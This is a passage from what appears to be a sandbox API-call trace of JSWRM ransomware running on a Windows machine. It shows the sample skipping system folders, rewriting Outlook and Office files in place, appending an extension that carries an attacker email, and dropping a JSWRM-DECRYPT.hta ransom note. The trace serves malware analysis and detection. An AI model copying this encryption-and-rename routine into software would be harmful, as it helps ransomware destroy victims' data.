lpMultiByteStr="OUTLOOK.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.692] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca850099, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca850099, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca850099, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x740, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLOOK.EXE.MANIFEST", cAlternateFileName="OUTLOO~1.MAN")) returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2=".") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="..") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="...") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="windows") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="recovery") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="perflogs") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="documents and settings") returned 1 [0137.693] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="$RECYCLE.BIN") returned 1 [0137.693] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="system volume information") returned -1 [0137.693] lstrcmpiW (lpString1="OUTLOOK.EXE.MANIFEST", lpString2="msocache") returned 1 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE.MANIFEST", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE.MANIFEST", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.EXE.MANIFEST", lpUsedDefaultChar=0x0) returned 20 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE.MANIFEST", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE.MANIFEST", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.EXE.MANIFEST", lpUsedDefaultChar=0x0) returned 20 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.791] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1856) returned 1 [0137.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.791] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x740, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x740, lpOverlapped=0x0) returned 1 [0137.793] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.793] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x740, lpOverlapped=0x0) returned 1 [0137.793] CloseHandle (hObject=0x45c) returned 1 [0137.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE.MANIFEST.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.794] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c91d744, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLOOK.VisualElementsManifest.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2=".") returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="..") returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="...") returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="windows") returned -1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0137.795] lstrcmpiW (lpString1="OUTLOOK.VisualElementsManifest.xml", lpString2="msocache") returned 1 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 34 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 34 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.796] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=342) returned 1 [0137.796] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.796] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0137.797] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.797] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0137.797] CloseHandle (hObject=0x45c) returned 1 [0137.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlook.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.798] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc86400, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc86400, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookAutoDiscover", cAlternateFileName="OUTLOO~1")) returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2=".") returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="..") returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="...") returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="windows") returned -1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="recovery") returned -1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="perflogs") returned -1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="documents and settings") returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="$RECYCLE.BIN") returned 1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="system volume information") returned -1 [0137.798] lstrcmpiW (lpString1="OutlookAutoDiscover", lpString2="msocache") returned 1 [0137.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\jswrm-decrypt.hta")) returned 0xffffffff [0137.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.802] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.802] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0137.803] CloseHandle (hObject=0x45c) returned 1 [0137.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\jswrm-decrypt.hta")) returned 0x20 [0137.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc86400, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48cd1bb1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0137.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0137.805] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc86400, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48cd1bb1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.806] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0137.806] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0137.806] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c91d744, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c91d744, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c91d744, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AMERITECH.NET.XML", cAlternateFileName="AMERIT~1.XML")) returned 1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2=".") returned 1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="..") returned 1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="...") returned 1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="windows") returned -1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="recovery") returned -1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="perflogs") returned -1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="documents and settings") returned -1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="system volume information") returned -1 [0137.806] lstrcmpiW (lpString1="AMERITECH.NET.XML", lpString2="msocache") returned -1 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AMERITECH.NET.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AMERITECH.NET.XML", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AMERITECH.NET.XML", lpUsedDefaultChar=0x0) returned 17 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AMERITECH.NET.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AMERITECH.NET.XML", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AMERITECH.NET.XML", lpUsedDefaultChar=0x0) returned 17 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\AMERITECH.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\ameritech.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.808] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=816) returned 1 [0137.808] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.808] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0137.810] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.810] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0137.810] CloseHandle (hObject=0x238) returned 1 [0137.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\AMERITECH.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\ameritech.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\AMERITECH.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\ameritech.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.811] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c91d744, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c91d744, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c91d744, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BTINTERNET.NET.XML", cAlternateFileName="BTINTE~1.XML")) returned 1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2=".") returned 1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="..") returned 1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="...") returned 1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="windows") returned -1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="recovery") returned -1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="perflogs") returned -1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="documents and settings") returned -1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="system volume information") returned -1 [0137.811] lstrcmpiW (lpString1="BTINTERNET.NET.XML", lpString2="msocache") returned -1 [0137.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTINTERNET.NET.XML", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTINTERNET.NET.XML", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTINTERNET.NET.XML", lpUsedDefaultChar=0x0) returned 18 [0137.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTINTERNET.NET.XML", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTINTERNET.NET.XML", cchWideChar=18, lpMultiByteStr=0x240f48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTINTERNET.NET.XML", lpUsedDefaultChar=0x0) returned 18 [0137.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTINTERNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btinternet.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.812] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=807) returned 1 [0137.812] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.812] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.814] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.814] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.814] CloseHandle (hObject=0x238) returned 1 [0137.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTINTERNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btinternet.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTINTERNET.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btinternet.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.815] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c91d744, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c91d744, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c91d744, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BTOPENWORLD.COM.XML", cAlternateFileName="BTOPEN~1.XML")) returned 1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2=".") returned 1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="..") returned 1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="...") returned 1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="windows") returned -1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="recovery") returned -1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="perflogs") returned -1 [0137.815] lstrcmpiW 